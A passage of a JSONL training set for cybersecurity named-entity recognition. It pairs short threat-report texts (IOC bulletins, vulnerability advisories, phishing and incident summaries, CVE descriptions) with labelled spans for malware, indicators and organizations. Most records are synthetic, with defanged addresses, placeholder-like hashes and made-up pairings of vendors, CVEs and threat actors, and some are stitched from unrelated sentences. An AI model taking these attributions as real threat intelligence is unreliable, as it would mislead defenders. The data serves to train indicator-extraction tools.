]cc\n- alert@phishing-domain[.]com\nFile Indicators:\n- SHA1: c60b0b49fa71b2818e9895b6561c4d5aee6f3c67\n- SHA1: 6aae40c1d8adc5d1c55382a063af98350c61fa1e\n- Drop path: /etc/cron.d/taskhost.exe", "spans": {"Malware: DarkSide": [[15, 23]], "Indicator: 202.218.84.147": [[56, 88]], "Indicator: 203.94.193.98": [[91, 122]], "Indicator: 10.73.167.115": [[125, 144]], "Indicator: proxy-data.top": [[147, 165]], "Indicator: gatewayedge.live": [[168, 188]], "Indicator: https://proxy-cdn.club/gate.php": [[197, 232]], "Indicator: https://cloud-data.info/callback": [[235, 271]], "Indicator: contact@identity-verify.cc": [[289, 319]], "Indicator: alert@phishing-domain.com": [[322, 349]], "Indicator: c60b0b49fa71b2818e9895b6561c4d5aee6f3c67": [[375, 415]], "Indicator: 6aae40c1d8adc5d1c55382a063af98350c61fa1e": [[424, 464]]}, "info": {"id": "synth_v2_01433", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2022-34807 is a critical command injection affecting Barracuda ESG. Proofpoint confirmed active exploitation by Salt Typhoon in the wild. Exploitation delivers DanaBot (MD5: 09ff5e82c135dfe8b268556361562a4f) which is dropped to /opt/app/bin/taskhost.exe. The exploit payload is hosted at hxxps://dataportal[.]top/collect and communicates to 10 [ . ] 103 [ . ] 8 [ . 
] 72 for C2.", "spans": {"Vulnerability: CVE-2022-34807": [[24, 38]], "Vulnerability: command injection": [[53, 70]], "System: Barracuda ESG": [[81, 94]], "Organization: Proofpoint": [[96, 106]], "Malware: DanaBot": [[188, 195]], "Indicator: 09ff5e82c135dfe8b268556361562a4f": [[202, 234]], "Indicator: hxxps://dataportal.top/collect": [[316, 348]], "Indicator: 10.103.8.72": [[369, 398]]}, "info": {"id": "synth_v2_00715", "source": "defanged_augment"}} {"text": "Artifact Analysis for SmokeLoader campaign:\nStage 1 dropper at /opt/app/bin/agent.py - SHA1: bc3596961e3c7d365d3e46e20a52b68e683361f9\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\csrss.exe - SHA256: 839e132455cd1373f93bd1679955b0abdf6de865c08e35fcdaaa35d88ad90ae9\nFinal payload at /home/user/.config/beacon.dll - SHA1: d55c529b6dc988b95797fd47682c851fe2848e32\nExfiltration module - SHA1: b12f52d2d60e711afe4aca818a798910229bcb74\nAll stages communicated with 126 [ . ] 172 [ . ] 68 [ . ] 204. PsExec signatures detected in Stage 2.", "spans": {"Malware: SmokeLoader": [[22, 33]], "Indicator: bc3596961e3c7d365d3e46e20a52b68e683361f9": [[93, 133]], "Indicator: 839e132455cd1373f93bd1679955b0abdf6de865c08e35fcdaaa35d88ad90ae9": [[206, 270]], "Indicator: d55c529b6dc988b95797fd47682c851fe2848e32": [[326, 366]], "Indicator: b12f52d2d60e711afe4aca818a798910229bcb74": [[395, 435]], "Indicator: 126.172.68.204": [[465, 497]]}, "info": {"id": "synth_v2_01990", "source": "defanged_augment"}} {"text": "The above code allows DealersChoice to load a second SWF object , specifically loading it with an argument that includes a C2 URL of “ hxxp://ndpmedia24[.]com/0pq6m4f.m3u8 ” .", "spans": {"Indicator: http://ndpmedia24.com/0pq6m4f.m3u8": [[135, 171]]}, "info": {"id": "cyberner_stix_train_005416", "source": "defanged_augment"}} {"text": "CrowdStrike detected a multi-stage attack chain. The initial phishing email from helpdesk@account-update[ . ]xyz contained a link to hxxps://mailportal[ . 
]online/wp-content/uploads/doc.php. This redirected to hxxps://apistorage[.]xyz/admin/config on update-cloud[ . ]online. A secondary email from admin@urgent-notice[ . ]online pointed to hxxp://backupcloud[ . ]cc/gate.php which delivered Vidar. The final payload callback was hxxps://node-auth[ . ]org/gate.php resolving to 10 [ . ] 131 [ . ] 49 [ . ] 209 via update-auth[ . ]com.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Indicator: helpdesk@account-update.xyz": [[81, 112]], "Indicator: https://mailportal.online/wp-content/uploads/doc.php": [[133, 189]], "Indicator: https://apistorage.xyz/admin/config": [[210, 247]], "Indicator: update-cloud.online": [[251, 274]], "Indicator: admin@urgent-notice.online": [[299, 329]], "Indicator: hxxp://backupcloud.cc/gate.php": [[341, 375]], "Malware: Vidar": [[392, 397]], "Indicator: hxxps://node-auth.org/gate.php": [[430, 464]], "Indicator: 10.131.49.209": [[478, 509]], "Indicator: update-auth.com": [[514, 533]]}, "info": {"id": "synth_v2_01801", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2022-46178 is a critical cross-site scripting affecting SonicWall SMA. CrowdStrike confirmed active exploitation by Sandworm in the wild. Exploitation delivers Conti (SHA1: c91a653c5981c3859b73a4810be1749cf31983e8) which is dropped to /tmp/lsass.dmp. The exploit payload is hosted at hxxp://nodeapi[.]online/login and communicates to 59 [ . ] 63 [ . ] 111 [ . ] 196 for C2.", "spans": {"Vulnerability: CVE-2022-46178": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: SonicWall SMA": [[84, 97]], "Organization: CrowdStrike": [[99, 110]], "Malware: Conti": [[188, 193]], "Indicator: c91a653c5981c3859b73a4810be1749cf31983e8": [[201, 241]], "Indicator: hxxp://nodeapi.online/login": [[312, 341]], "Indicator: 59.63.111.196": [[362, 393]]}, "info": {"id": "synth_v2_00829", "source": "defanged_augment"}} {"text": "Subdomains at phmail[ . 
]us have been linked to malicious activity dating back as far as December 2011 .", "spans": {"Indicator: phmail.us": [[14, 27]]}, "info": {"id": "dnrti_train_002198", "source": "defanged_augment"}} {"text": "If the original SMS app has been restored , it will send “ the app returned to its original place. ” Controlling TrickMo TrickMo ’ s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware ’ s configuration and make it execute certain tasks . PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Symantec has found evidence of Starloader files being named AdobeUpdate[ . ]exe , AcrobatUpdate[.]exe , and INTELUPDATE[ . ]EXE among others .", "spans": {"Malware: TrickMo": [[113, 120], [121, 128]], "Organization: Government": [[496, 506]], "Organization: Defense": [[509, 516]], "Organization: Research": [[519, 527]], "Organization: Technology sectors": [[534, 552]], "Organization: US Defense": [[607, 617]], "Organization: satellite": [[631, 640]], "Organization: aerospace industries": [[645, 665]], "Organization: Symantec": [[668, 676]], "Indicator: Starloader files": [[699, 715]], "Indicator: AdobeUpdate.exe": [[728, 747]], "Indicator: AcrobatUpdate.exe": [[750, 769]], "Indicator: INTELUPDATE.EXE": [[776, 795]]}, "info": {"id": "cyberner_stix_train_000666", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2022-46178 is a critical authentication bypass affecting Palo Alto PAN-OS. Palo Alto Unit 42 confirmed active exploitation by Gamaredon in the wild. Exploitation delivers TrickBot (MD5: 089c8212c153466ee584086b545ee73e) which is dropped to /dev/shm/payload.bin. 
The exploit payload is hosted at hxxps://portalcache[.]io/callback and communicates to 10 [ . ] 150 [ . ] 72 [ . ] 199 for C2.", "spans": {"Vulnerability: CVE-2022-46178": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Palo Alto PAN-OS": [[85, 101]], "Organization: Palo Alto Unit 42": [[103, 120]], "Malware: TrickBot": [[199, 207]], "Indicator: 089c8212c153466ee584086b545ee73e": [[214, 246]], "Indicator: hxxps://portalcache.io/callback": [[323, 356]], "Indicator: 10.150.72.199": [[377, 408]]}, "info": {"id": "synth_v2_00670", "source": "defanged_augment"}} {"text": "Blog Post by Rapid7: Tracking UNC2452's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-37666 against Windows 11 deployments. The initial access vector involves spear-phishing emails from verify@account-update[.]xyz delivering RemcosRAT. Post-compromise, the attackers deploy Latrodectus and use Impacket for reconnaissance. C2 infrastructure includes 2 [ . ] 253 [ . ] 168 [ . ] 183 and cloudedge[ . ]link. A staging server at hxxp://mail-cloud[ . ]club/secure/token hosts additional tooling. 
Key artifact: C:\\Program Files\\Common Files\\loader.exe (SHA1: 7152a2dd386c6afb2d701303f4ed9e5f933540e5).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2025-37666": [[117, 131]], "System: Windows 11": [[140, 150]], "Indicator: verify@account-update.xyz": [[226, 253]], "Malware: RemcosRAT": [[265, 274]], "Malware: Latrodectus": [[314, 325]], "Indicator: 2.253.168.183": [[390, 421]], "Indicator: cloudedge.link": [[426, 444]], "Indicator: http://mail-cloud.club/secure/token": [[466, 505]], "Indicator: 7152a2dd386c6afb2d701303f4ed9e5f933540e5": [[594, 634]]}, "info": {"id": "synth_v2_01548", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Malachite.A W32.WLKSM.A1 Virus.WLKSM.Win32.1 Win32.Malachite.A Win32.Virus.MoonRover.a W32/Malachite.A Virus.Win32.MoonRover Virus.Win32.WLKSM.a Virus.Win32.Infector.dleseh Virus.Win32.WLKSM.AA BehavesLike[ . ]Win32[ . ]Virut[ . ]cc W32/Malachite.A Win32.Malachite.A Virus.Win32.WLKSM.a Win32.Malachite.A Win32.Malachite.A Win32.Malachite.A Virus.Win32.Wlksm.c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.cc": [[226, 264]]}, "info": {"id": "cyner2_train_005899", "source": "defanged_augment"}} {"text": "IOC Bulletin - Royal Campaign:\nNetwork Indicators:\n- 163[.]101[.]55[.]169\n- 10[.]128[.]175[.]33\n- 177 [ . ] 168 [ . ] 212 [ . ] 116\n- cache-storage[ . 
]com\n- cdn-mail[.]site\nURLs:\n- hxxp://relay-api[.]org/secure/token\n- hxxps://backup-static[.]info/panel/index.html\nEmail Senders:\n- it@account-update[.]xyz\n- report@urgent-notice[.]online\nFile Indicators:\n- SHA1: ca3ff41f5d258f837c84eb0c2f474993d2c667a8\n- MD5: d1df35e334d24bab4e10c12bc5d57bbd\n- Drop path: /var/tmp/loader.exe", "spans": {"Malware: Royal": [[15, 20]], "Indicator: 163.101.55.169": [[53, 73]], "Indicator: 10.128.175.33": [[76, 95]], "Indicator: 177.168.212.116": [[98, 131]], "Indicator: cache-storage.com": [[134, 155]], "Indicator: cdn-mail.site": [[158, 173]], "Indicator: http://relay-api.org/secure/token": [[182, 217]], "Indicator: hxxps://backup-static.info/panel/index.html": [[220, 265]], "Indicator: it@account-update.xyz": [[283, 306]], "Indicator: report@urgent-notice.online": [[309, 338]], "Indicator: ca3ff41f5d258f837c84eb0c2f474993d2c667a8": [[364, 404]], "Indicator: d1df35e334d24bab4e10c12bc5d57bbd": [[412, 444]]}, "info": {"id": "synth_v2_01468", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan/W32.Zapchast.113152 Backdoor.KeyBoy Trojan.Zapchast.Win32.29227 Trojan.Heur.LP.EDDB38 Win32.Trojan.WisdomEyes.151026.9950.9999 Backdoor.Kboy Trojan.Win32.Zapchast.afhn Trojan.Win32.Zapchast.cjltha Win32.Trojan.Zapchast.Htcu BehavesLike[.]Win32[.]GameVance[.]ch Trojan/Zapchast.iik TR/Spy.113152.29 Trojan/Win32.Zapchast Backdoor.Win32.KeyBoy.113152[h] Win-Trojan/Keyboy.113152 Trojan.Win32.Zapchast.afhn Trojan.Zapchast!0ThicNhZU3g Trojan.Win32.Zapchast W32/Zapchast.AFHN!tr Win32/Trojan.020", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.GameVance.ch": [[257, 293]]}, "info": {"id": "cyner2_train_000343", "source": "defanged_augment"}} {"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred . 
Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group . APT33 : 162[.]250[.]145[.]222 [REDACTED][.]ddns[.]net . loop all over the string to execute the decoding operation .", "spans": {"System: Android": [[0, 7]], "System: Google Play": [[89, 100]], "Organization: Microsoft": [[124, 133]], "Organization: Facebook": [[158, 166]], "Indicator: 162.250.145.222": [[281, 302]], "Indicator: [REDACTED].ddns.net": [[303, 326]]}, "info": {"id": "cyberner_stix_train_001475", "source": "defanged_augment"}} {"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface . and as discovered later , even the U.S. and UK governments . ShadowHammer : hxxps://liveupdate01s[.]asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip . Because phishing often leverages the impersonation of trusted associates from highlevel executives to legitimate vendors and partner organizations and includes personal details skimmed from social media or other publicly available information , its tempting to call them sophisticated .", "spans": {"System: Android": [[4, 11]], "Organization: governments": [[256, 267]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip": [[285, 383]]}, "info": {"id": "cyberner_stix_train_007626", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 186 [ . ] 182 [ . ] 66 [ . ] 180, the CISA IR team identified BatLoader running as C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. The threat actor, believed to be Sandworm, used Hashcat for credential harvesting and Seatbelt for lateral movement. Exfiltrated data was sent to update-cache[ . ]link and proxycache[ . ]live. 
The initial dropper (SHA1: cef1e7cc266b642d25f1a83551b8424ea7bc467b) was delivered via a phishing email from info@secure-verify[.]net. A second C2 node was observed at 172[.]208[.]51[.]129, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\payload.bin.", "spans": {"Indicator: 186.182.66.180": [[64, 96]], "Organization: CISA": [[102, 106]], "Malware: BatLoader": [[126, 135]], "Indicator: update-cache.link": [[337, 358]], "Indicator: proxycache.live": [[363, 382]], "Indicator: cef1e7cc266b642d25f1a83551b8424ea7bc467b": [[411, 451]], "Indicator: info@secure-verify.net": [[493, 517]], "Indicator: 172.208.51.129": [[552, 572]]}, "info": {"id": "synth_v2_00369", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: NSA identified a large-scale phishing operation. Emails originated from verify@mail-service[.]info and account@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxps://relay-cloud[ . ]club/callback which hosted a credential harvesting page on node-api[ . ]online. A secondary link hxxps://securecache[ . ]xyz/secure/token delivered WarmCookie (SHA256: dcaab862c474b782cecaba7df67958c94366c06a7a0b97718669bd903263a3de). The malware was saved to /home/user/.config/payload.bin and established C2 with 211[.]185[.]174[.]145.", "spans": {"Organization: NSA": [[26, 29]], "Indicator: verify@mail-service.info": [[98, 124]], "Indicator: account@login-portal.tech": [[129, 156]], "Indicator: hxxps://relay-cloud.club/callback": [[213, 250]], "Indicator: node-api.online": [[296, 315]], "Indicator: hxxps://securecache.xyz/secure/token": [[334, 374]], "Malware: WarmCookie": [[385, 395]], "Indicator: dcaab862c474b782cecaba7df67958c94366c06a7a0b97718669bd903263a3de": [[405, 469]], "Indicator: 211.185.174.145": [[552, 573]]}, "info": {"id": "synth_v2_01018", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Cisco Talos identified a large-scale phishing operation. 
Emails originated from helpdesk@mail-service[ . ]info and verify@mail-service[ . ]info, spoofing legitimate services. Victims were directed to hxxps://secure-storage[ . ]xyz/admin/config which hosted a credential harvesting page on cdn-proxy[.]online. A secondary link hxxp://proxy-static[.]tech/api/v2/auth delivered Qbot (SHA1: 08de67f0dca5ccf4ec6354b9a03c7b5bb584b087). The malware was saved to C:\\Users\\admin\\Downloads\\chrome_helper.exe and established C2 with 90[.]31[.]115[.]108.", "spans": {"Organization: Cisco Talos": [[26, 37]], "Indicator: helpdesk@mail-service.info": [[106, 136]], "Indicator: verify@mail-service.info": [[141, 169]], "Indicator: hxxps://secure-storage.xyz/admin/config": [[226, 269]], "Indicator: cdn-proxy.online": [[315, 333]], "Indicator: http://proxy-static.tech/api/v2/auth": [[352, 390]], "Malware: Qbot": [[401, 405]], "Indicator: 08de67f0dca5ccf4ec6354b9a03c7b5bb584b087": [[413, 453]], "Indicator: 90.31.115.108": [[548, 567]]}, "info": {"id": "synth_v2_00983", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 102[.]41[.]96[.]225, the Tenable IR team identified Conti running as C:\\Program Files\\Common Files\\chrome_helper.exe. The threat actor, believed to be Velvet Tempest, used Impacket for credential harvesting and Sharphound for lateral movement. Exfiltrated data was sent to nodeedge[.]top and cachebackup[ . ]club. The initial dropper (MD5: 812c81fa7bbec1f9dffb3f98e33d93ca) was delivered via a phishing email from noreply@mail-service[.]info. 
A second C2 node was observed at 43[.]218[.]129[.]178, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\shell.php.", "spans": {"Indicator: 102.41.96.225": [[64, 83]], "Organization: Tenable": [[89, 96]], "Malware: Conti": [[116, 121]], "Indicator: nodeedge.top": [[337, 351]], "Indicator: cachebackup.club": [[356, 376]], "Indicator: 812c81fa7bbec1f9dffb3f98e33d93ca": [[404, 436]], "Indicator: noreply@mail-service.info": [[478, 505]], "Indicator: 43.218.129.178": [[540, 560]]}, "info": {"id": "synth_v2_00325", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig!O Downloader.Small.28090 Trojan/Downloader.Harnig.al Win32.Trojan.WisdomEyes.16070401.9500.9939 Downloader.Trojan Win.Downloader.Small-579 Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan.Downloader.Harnig.al Trojan.Win32.Harnig.voqq Trojan.Win32.A.Downloader.10240.FS Troj.Downloader.W32.Harnig.al!c Trojan.Downloader.Harnig.al TrojWare.Win32.TrojanDownloader.Harnig.AL Trojan.Downloader.Harnig.al Trojan.DownLoader.919 Downloader.Harnig.Win32.353 BehavesLike[ . ]Win32[ . ]Cutwail[ . ]lt Trojan-Downloader.Win32.Harnig Trojan/Startpage.nv W32.Trojan.Downloader.Harnig Trojan[Downloader]/Win32.Harnig Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan/Win32.Downloader.R39433 Trojan.Downloader.Harnig.al OScope.Downloader.GCLA Trj/Harnig.AD Win32/TrojanDownloader.Harnig.AL Win32.Trojan-downloader.Harnig.Sxyp Trojan.QHost.L W32/Harnig.AI!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Cutwail.lt": [[554, 594]]}, "info": {"id": "cyner2_train_007134", "source": "defanged_augment"}} {"text": "Criminals are increasingly using obfuscation , the deliberate act of creating complex code to make it difficult to analyze . 
LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . The difference between the original and patched hpqhvind[ . ]exe . Paired with KillNet ’s reported compromise and leak of North Atlantic Treaty Organization ( NATO ) documents , this sudden increase in capability could indicate significant investment from more sophisticated actors , particularly when measured against KillNet ’s capabilities since the collective ’s inception in late 2021 .", "spans": {"Organization: Dell SecureWorks": [[192, 208]], "Indicator: hpqhvind.exe": [[418, 434]]}, "info": {"id": "cyberner_stix_train_004597", "source": "defanged_augment"}} {"text": "Palo Alto Unit 42 published a threat intelligence report linking Granite Typhoon to a new campaign exploiting CVE-2020-16717 in Cisco ASA. The attackers deployed Emotet via LaZagne, establishing C2 communication with 10[.]28[.]102[.]69 and backup-cloud[ . ]link. A secondary payload was downloaded from hxxp://mail-relay[.]net/assets/js/payload.js. The malware binary (SHA1: 31de1c02f56ef5ec2512db09f71df92e84e8e098) was dropped to C:\\Users\\admin\\Desktop\\helper.sh. Phishing emails were sent from account@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 172 [ . ] 128 [ . ] 74 [ . 
] 215.", "spans": {"Organization: Palo Alto Unit 42": [[0, 17]], "Vulnerability: CVE-2020-16717": [[110, 124]], "System: Cisco ASA": [[128, 137]], "Malware: Emotet": [[162, 168]], "Indicator: 10.28.102.69": [[217, 235]], "Indicator: backup-cloud.link": [[240, 261]], "Indicator: hxxp://mail-relay.net/assets/js/payload.js": [[303, 347]], "Indicator: 31de1c02f56ef5ec2512db09f71df92e84e8e098": [[375, 415]], "Indicator: account@mail-service.info": [[497, 524]], "Indicator: 172.128.74.215": [[590, 622]]}, "info": {"id": "synth_v2_00144", "source": "defanged_augment"}} {"text": "SentinelOne published a threat intelligence report linking Gamaredon to a new campaign exploiting CVE-2021-24446 in Atlassian Confluence. The attackers deployed Play via Brute Ratel, establishing C2 communication with 192[.]99[.]113[.]201 and apinode[ . ]site. A secondary payload was downloaded from hxxps://proxy-storage[ . ]cc/admin/config. The malware binary (MD5: cb214460df2524d9f2d95ffb3ebec031) was dropped to C:\\Users\\admin\\Desktop\\payload.bin. Phishing emails were sent from contact@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 51 [ . ] 11 [ . ] 42 [ . ] 138.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2021-24446": [[98, 112]], "System: Atlassian Confluence": [[116, 136]], "Malware: Play": [[161, 165]], "Indicator: 192.99.113.201": [[218, 238]], "Indicator: apinode.site": [[243, 259]], "Indicator: hxxps://proxy-storage.cc/admin/config": [[301, 342]], "Indicator: cb214460df2524d9f2d95ffb3ebec031": [[369, 401]], "Indicator: contact@auth-check.org": [[485, 511]], "Indicator: 51.11.42.138": [[577, 607]]}, "info": {"id": "synth_v2_00238", "source": "defanged_augment"}} {"text": "The BlackCat ransomware, also tracked as ALPHV, deployed a new variant in 2024 targeting VMware ESXi hypervisors. The Linux variant with SHA1 hash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b was designed to encrypt virtual machine disk files on ESXi hosts. 
The attack began with exploitation of CVE-2024-37085 in VMware ESXi to gain administrative access. The threat actor used SSH to connect to ESXi hosts from 172[.]16[.]45[.]3 and uploaded the ransomware to /tmp/esxi_encrypt. The ransomware configuration was stored at /tmp/.config.json. Exfiltration of sensitive data occurred via rclone to Mega cloud storage, with traffic routed through 185 [ . ] 174 [ . ] 137 [ . ] 92. Additional SHA256 hashes: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 and a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1. C2 communications used the domain alphv-paymentsite[ . ]onion.", "spans": {"Malware: BlackCat": [[4, 12]], "Malware: ALPHV": [[41, 46]], "System: VMware ESXi": [[89, 100], [310, 321]], "Indicator: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": [[147, 187]], "Vulnerability: CVE-2024-37085": [[292, 306]], "Indicator: 172.16.45.3": [[409, 426]], "Indicator: 185.174.137.92": [[641, 673]], "Indicator: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5": [[701, 765]], "Indicator: a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1": [[770, 834]], "Indicator: alphv-paymentsite.onion": [[870, 897]]}, "info": {"id": "malware_00019", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-27691 is a critical heap overflow affecting F5 BIG-IP. Europol confirmed active exploitation by Granite Typhoon in the wild. Exploitation delivers Dridex (SHA256: 0315dab475e280e354e79c3b6b7d98d58054aa0e093ee3fe03a3984a162b025a) which is dropped to C:\\Users\\admin\\Desktop\\backdoor.elf. 
The exploit payload is hosted at hxxp://loginsync[.]site/login and communicates to 172[.]53[.]140[.]215 for C2.", "spans": {"Vulnerability: CVE-2023-27691": [[24, 38]], "Vulnerability: heap overflow": [[53, 66]], "System: F5 BIG-IP": [[77, 86]], "Organization: Europol": [[88, 95]], "Malware: Dridex": [[180, 186]], "Indicator: 0315dab475e280e354e79c3b6b7d98d58054aa0e093ee3fe03a3984a162b025a": [[196, 260]], "Indicator: hxxp://loginsync.site/login": [[352, 381]], "Indicator: 172.53.140.215": [[402, 422]]}, "info": {"id": "synth_v2_00767", "source": "defanged_augment"}} {"text": "AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. Prior to 0.6.1, AutoGPT allows of leakage of cross-domain cookies and protected headers in requests redirect. AutoGPT uses a wrapper around the requests python library, located in autogpt_platform/backend/backend/util/request.py. In this wrapper, redirects are specifically NOT followed for the first request. If the wrapper is used with allow_redirects set to True (which is the default), any redirect is not followed by the initial request, but rather re-requested by the wrapper using the new location. However, there is a fundamental flaw in manually re-requesting the new location: it does not account for security-sensitive headers which should not be sent cross-origin, such as the Authorization and Proxy-Authorization header, and cookies. For example in autogpt_platform/backend/backend/blocks/github/_api.py, an Authorization header is set when retrieving data from the GitHub API. However, if GitHub suffers from an open redirect vulnerability (such as the made-up example of hxxps://api[ . ]github[ . ]com/repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=hxxps://joshua.hu/), and the script can be coerced into visiting it with the Authorization header, the GitHub credentials in the Authorization header will be leaked. 
This allows leaking auth headers and private cookies. This vulnerability is fixed in 0.6.1.", "spans": {"Indicator: https://api.github.com/repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=https://joshua.hu/": [[1132, 1260]], "Organization: GitHub": [[1025, 1031], [1049, 1055], [1345, 1351]], "Vulnerability: open redirect": [[1072, 1085]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-31491"}} {"text": "Malware Analysis Report: Emotet (SHA256: 6e5e20d1fead7fe9f9fda50776850e5e04600198a5d74b4077cd412109504e27). Upon execution on Ivanti Connect Secure, the sample creates C:\\Program Files\\Common Files\\lsass.dmp and injects into legitimate processes. Network analysis shows beaconing to 54[.]34[.]30[.]194 every 60 seconds and DNS queries to loginlogin[ . ]online. The second stage was fetched from hxxp://data-portal[ . ]link/admin/config and written to /tmp/helper.sh. The payload uses Covenant-style techniques for defense evasion. A secondary hash (MD5: f6fe795a70dbfe4be1a038f33c21a2ae) was extracted from the unpacked payload.", "spans": {"Malware: Emotet": [[25, 31]], "Indicator: 6e5e20d1fead7fe9f9fda50776850e5e04600198a5d74b4077cd412109504e27": [[41, 105]], "System: Ivanti Connect Secure": [[126, 147]], "Indicator: 54.34.30.194": [[283, 301]], "Indicator: loginlogin.online": [[338, 359]], "Indicator: hxxp://data-portal.link/admin/config": [[395, 435]], "Indicator: f6fe795a70dbfe4be1a038f33c21a2ae": [[554, 586]]}, "info": {"id": "synth_v2_00505", "source": "defanged_augment"}} {"text": "Blog Post by NSA: Tracking APT29's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-40108 against Apache Struts deployments. The initial access vector involves spear-phishing emails from support@identity-verify[.]cc delivering Vidar. Post-compromise, the attackers deploy Royal and use LinPEAS for reconnaissance. C2 infrastructure includes 172[.]48[.]46[.]153 and synccdn[ . ]link. 
A staging server at hxxps://secureproxy[ . ]io/panel/index.html hosts additional tooling. Key artifact: /tmp/chrome_helper.exe (SHA1: ef454b124e0163623f8223e1014c400250e8147d).", "spans": {"Organization: NSA": [[13, 16]], "Vulnerability: CVE-2022-40108": [[112, 126]], "System: Apache Struts": [[135, 148]], "Indicator: support@identity-verify.cc": [[224, 252]], "Malware: Vidar": [[264, 269]], "Malware: Royal": [[309, 314]], "Indicator: 172.48.46.153": [[378, 397]], "Indicator: synccdn.link": [[402, 418]], "Indicator: hxxps://secureproxy.io/panel/index.html": [[440, 483]], "Indicator: ef454b124e0163623f8223e1014c400250e8147d": [[554, 594]]}, "info": {"id": "synth_v2_01592", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. Emails originated from updates@document-share[.]link and updates@urgent-notice[.]online, spoofing legitimate services. Victims were directed to hxxps://login-data[ . ]top/admin/config which hosted a credential harvesting page on proxycache[ . ]link. A secondary link hxxps://mailgateway[ . ]io/portal/verify delivered Gootloader (SHA256: 1435898cb7c23425eb14eb401ef1d006e4729337072d75ca97845245fef22440). 
The malware was saved to C:\\Program Files\\Common Files\\ntds.dit and established C2 with 209[.]11[.]33[.]111.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: updates@document-share.link": [[106, 135]], "Indicator: updates@urgent-notice.online": [[140, 170]], "Indicator: https://login-data.top/admin/config": [[227, 266]], "Indicator: proxycache.link": [[312, 331]], "Indicator: https://mailgateway.io/portal/verify": [[350, 390]], "Malware: Gootloader": [[401, 411]], "Indicator: 1435898cb7c23425eb14eb401ef1d006e4729337072d75ca97845245fef22440": [[421, 485]], "Indicator: 209.11.33.111": [[576, 595]]}, "info": {"id": "synth_v2_01026", "source": "defanged_augment"}} {"text": "Once the user attempts to open the document , Microsoft Word immediately attempts to load the remote template containing a malicious macro and payload from the location specified within the settings[ . ]xml[ . ]rels file of the DOCX document .", "spans": {"Organization: Microsoft": [[46, 55]], "Indicator: settings.xml.rels": [[190, 215]]}, "info": {"id": "cyberner_stix_train_004154", "source": "defanged_augment"}} {"text": "Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. This is a follow up to GHSA-887w-pv2r-x8pm/CVE-2021-41276, the initial fix was incomplete. Tuleap does not sanitize properly the search filter built from the ldap_id attribute of a user during the daily synchronization. A malicious user could force accounts to be suspended or take over another account by forcing the update of the ldap_uid attribute. Note that the malicious user either need to have site administrator capability on the Tuleap instance or be an LDAP operator with the capability to create/modify account. The Tuleap instance needs to have the LDAP plugin activated and enabled for this issue to be exploitable. 
